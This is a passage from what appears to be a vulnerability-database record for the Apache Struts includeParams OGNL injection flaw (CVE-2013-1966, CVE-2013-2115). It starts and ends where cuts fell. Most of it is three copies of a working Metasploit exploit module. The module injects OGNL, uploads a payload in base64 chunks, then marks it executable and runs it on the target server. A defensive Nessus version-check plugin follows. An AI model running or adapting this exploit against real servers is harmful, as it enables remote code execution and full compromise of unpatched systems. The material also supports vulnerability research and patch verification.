It should\r\n happen only when the payload is larger than the uri length.\r\n },\r\n 'Author' =>\r\n [\r\n # This vulnerability was also discovered by unknown members of:\r\n # 'Coverity security Research Laboratory'\r\n # 'NSFOCUS Security Team'\r\n 'Eric Kobrin', # Vulnerability Discovery\r\n 'Douglas Rodrigues', # Vulnerability Discovery\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2115'],\r\n [ 'CVE', '2013-1966'],\r\n [ 'OSVDB', '93645'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\r\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'May 24 2013',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\r\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject_string = @inject.gsub(/CMD/,cmd)\r\n uri = normalize_uri(target_uri.path)\r\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\r\n case datastore['HTTPMETHOD']\r\n when 
'POST'\r\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\r\n when 'GET'\r\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\r\n end\r\n\r\n # Display a nice \"progress bar\" instead of message spam\r\n case @notify_flag\r\n when 0\r\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\r\n @notify_flag = 1\r\n when 1\r\n print(\".\") # Progress dots\r\n when 2\r\n print_status(\"Payload upload complete\")\r\n end\r\n\r\n return send_request_cgi(req_hash) #Used for check function.\r\n end\r\n\r\n def exploit\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = false\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << 
\"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n print_status(\"Preparing payload...\")\r\n # Now with all the arch specific stuff set, perform the upload.\r\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\r\n # Fixed strings are tokens used for substitutions.\r\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\r\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\r\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\r\n case datastore['HTTPMETHOD']\r\n when 'GET'\r\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\r\n #This lets us know the length remaining for our base64'd payloads\r\n chunk_length = ((chunk_length/4).floor)*3\r\n when 'POST'\r\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\r\n end\r\n @notify_flag = 0\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n print_line() # new line character, after progress bar.\r\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\r\n 
execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = false)\r\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\r\n append = append ? \"true\" : \"false\" # converted for the string replacement.\r\n cmd = cmd.gsub!(/APPEND/,append)\r\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n print_status(\"Performing Check...\")\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25980/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:28", "description": "", "published": "2013-06-02T00:00:00", "type": "packetstorm", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-02T00:00:00", "id": "PACKETSTORM:121847", "href": "https://packetstormsecurity.com/files/121847/Apache-Struts-includeParams-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts includeParams Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.14.2. A specifically crafted request parameter can be used to inject \narbitrary OGNL code into the stack bypassing Struts and OGNL library protections. \nWhen targeting an action which requires interaction through GET the payload should \nbe split having into account the uri limits. In this case, if the rendered jsp has \nmore than one point of injection, it could result in payload corruption. It should \nhappen only when the payload is larger than the uri length. \n}, \n'Author' => \n[ \n# This vulnerability was also discovered by unknown members of: \n# 'Coverity security Research Laboratory' \n# 'NSFOCUS Security Team' \n'Eric Kobrin', # Vulnerability Discovery \n'Douglas Rodrigues', # Vulnerability Discovery \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-2115'], \n[ 'CVE', '2013-1966'], \n[ 'OSVDB', '93645'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'], \n[ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'May 24 2013', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), 
\nOptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]), \nOptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject_string = @inject.gsub(/CMD/,cmd) \nuri = normalize_uri(target_uri.path) \nreq_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] } \ncase datastore['HTTPMETHOD'] \nwhen 'POST' \nreq_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }}) \nwhen 'GET' \nreq_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) \nend \n \n# Display a nice \"progress bar\" instead of message spam \ncase @notify_flag \nwhen 0 \nprint_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\") \n@notify_flag = 1 \nwhen 1 \nprint(\".\") # Progress dots \nwhen 2 \nprint_status(\"Payload upload complete\") \nend \n \nreturn send_request_cgi(req_hash) #Used for check function. \nend \n \ndef exploit \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \n@java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\" \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = false \n#Now arch specific... 
\ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \nprint_status(\"Preparing payload...\") \n# Now with all the arch specific stuff set, perform the upload. \n# Need to calculate amount to allocate for non-dynamic parts of the URL. \n# Fixed strings are tokens used for substitutions. \nappend_length = append ? 
\"true\".length : \"false\".length # Gets around the boolean/string issue \nsub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length ) \nsub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length \ncase datastore['HTTPMETHOD'] \nwhen 'GET' \nchunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items. \n#This lets us know the length remaining for our base64'd payloads \nchunk_length = ((chunk_length/4).floor)*3 \nwhen 'POST' \nchunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore. \nend \n@notify_flag = 0 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nprint_line() # new line character, after progress bar. \n@notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file. \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = false) \ncmd = @java_upload_part_cmd.gsub(/FILENAME/,filename) \nappend = append ? \"true\" : \"false\" # converted for the string replacement. 
\ncmd = cmd.gsub!(/APPEND/,append) \ncmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part)) \nexecute_command(cmd) \nend \n \ndef check \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \nprint_status(\"Performing Check...\") \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121847/struts_include_params.rb.txt"}], "metasploit": [{"lastseen": "2020-10-15T01:28:42", "description": "This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET, the payload should be split, taking into account the URI limits. In this case, if the rendered JSP has more than one point of injection, it could result in payload corruption. 
This should happen only when the payload is larger than the URI length.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_INCLUDE_PARAMS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\n When targeting an action which requires interaction through GET, the payload should\n be split, taking into account the URI limits. In this case, if the rendered JSP has\n more than one point of injection, it could result in payload corruption. 
This should\n happen only when the payload is larger than the URI length.\n },\n 'Author' =>\n [\n # This vulnerability was also discovered by unknown members of:\n # 'Coverity security Research Laboratory'\n # 'NSFOCUS Security Team'\n 'Eric Kobrin', # Vulnerability Discovery\n 'Douglas Rodrigues', # Vulnerability Discovery\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-2115'],\n [ 'CVE', '2013-1966'],\n [ 'OSVDB', '93645'],\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\n ],\n 'Platform' => %w{ java linux win },\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ],\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n },\n ]\n ],\n 'DisclosureDate' => '2013-05-24',\n 'DefaultTarget' => 2))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\n ])\n end\n\n def execute_command(cmd, opts = {})\n inject_string = @inject.gsub(/CMD/,cmd)\n uri = normalize_uri(target_uri.path)\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\n case datastore['HTTPMETHOD']\n when 'POST'\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\n when 'GET'\n req_hash.merge!({ 'vars_get' => { 
datastore['PARAMETER'] => inject_string }})\n end\n\n # Display a nice \"progress bar\" instead of message spam\n case @notify_flag\n when 0\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\n @notify_flag = 1\n when 1\n print(\".\") # Progress dots\n when 2\n print_status(\"Payload upload complete\")\n end\n\n return send_request_cgi(req_hash) #Used for check function.\n end\n\n def exploit\n #initialise some base vars\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\n #Set up generic values.\n @payload_exe = rand_text_alphanumeric(4+rand(4))\n pl_exe = generate_payload_exe\n append = false\n #Now arch specific...\n case target['Platform']\n when 'linux'\n @payload_exe = \"/tmp/#{@payload_exe}\"\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\n when 'java'\n @payload_exe << \".jar\"\n pl_exe = payload.encoded_jar.pack\n exec_cmd = \"\"\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\n when 'win'\n @payload_exe = \"./#{@payload_exe}.exe\"\n exec_cmd 
= \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n\n print_status(\"Preparing payload...\")\n # Now with all the arch specific stuff set, perform the upload.\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\n # Fixed strings are tokens used for substitutions.\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\n case datastore['HTTPMETHOD']\n when 'GET'\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\n #This lets us know the length remaining for our base64'd payloads\n chunk_length = ((chunk_length/4).floor)*3\n when 'POST'\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\n end\n @notify_flag = 0\n while pl_exe.length > chunk_length\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\n append = true\n end\n java_upload_part(pl_exe,@payload_exe,append)\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\n print_line() # new line character, after progress bar.\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\n execute_command(exec_cmd)\n register_files_for_cleanup(@payload_exe)\n end\n\n def java_upload_part(part, filename, append = false)\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\n append = append ? 
\"true\" : \"false\" # converted for the string replacement.\n cmd = cmd.gsub!(/APPEND/,append)\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\n execute_command(cmd)\n end\n\n def check\n #initialise some base vars\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\n vprint_status(\"Performing Check...\")\n sleep_time = datastore['CHECK_SLEEPTIME']\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\n t1 = Time.now\n vprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\n response = execute_command(check_cmd)\n t2 = Time.now\n delta = t2 - t1\n\n\n if response.nil?\n return Exploit::CheckCode::Safe\n elsif delta < sleep_time\n return Exploit::CheckCode::Safe\n else\n return Exploit::CheckCode::Vulnerable\n end\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts_include_params.rb"}], "nessus": [{"lastseen": "2020-09-26T10:43:36", "description": "The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. 
It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2018-09-10T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/25\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)\");\n script_summary(english:\"Checks the Struts 2 version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. 
It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2115\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n \n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.1\", \"fixed_version\" : \"2.3.14.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:28:56", "description": "The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. 
